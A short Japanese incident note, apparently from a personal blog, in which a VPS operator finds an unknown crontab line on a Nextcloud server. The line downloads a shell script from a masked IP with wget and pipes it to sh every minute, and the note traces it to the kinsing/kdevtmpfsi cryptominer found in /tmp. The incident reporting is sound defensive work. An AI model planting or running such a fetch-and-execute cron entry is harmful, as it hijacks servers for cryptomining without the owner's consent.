Nextcloud を走らせている VPS の cron に勝手に1行追加されていた。偶然 www アカウントの crontab をみたら、次のような行が追加されていて、覚えが無い。
* * * * * wget -q -O - http://XXX.XXX.XXX.XXX/p.sh | sh > /dev/null 2>&1
abuseipdb.com によると Latvia の IP アドレスで、44回報告されている。どうやら仮想通貨のマイニングを行う kdevtmpfsi を実行させようとしているらしい。幸い wget が入っていなかったので動かなかったはず。
せめて日付を確認しておくべきだった。別の用事もあって先に書き換えてしまったのでもうわからない。
他の VPS や仮想環境には、少なくとも同じような crontab を使ったものは仕込まれていなかった。
もう少し調べたら、/tmp に実行ファイルが居た。
-rwxrwxrwx 1 www wheel 14643200 Dec 18 2020 kinsing*
file コマンドの結果は以下の通り
$ file /tmp/kinsing /tmp/kinsing: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v, stripped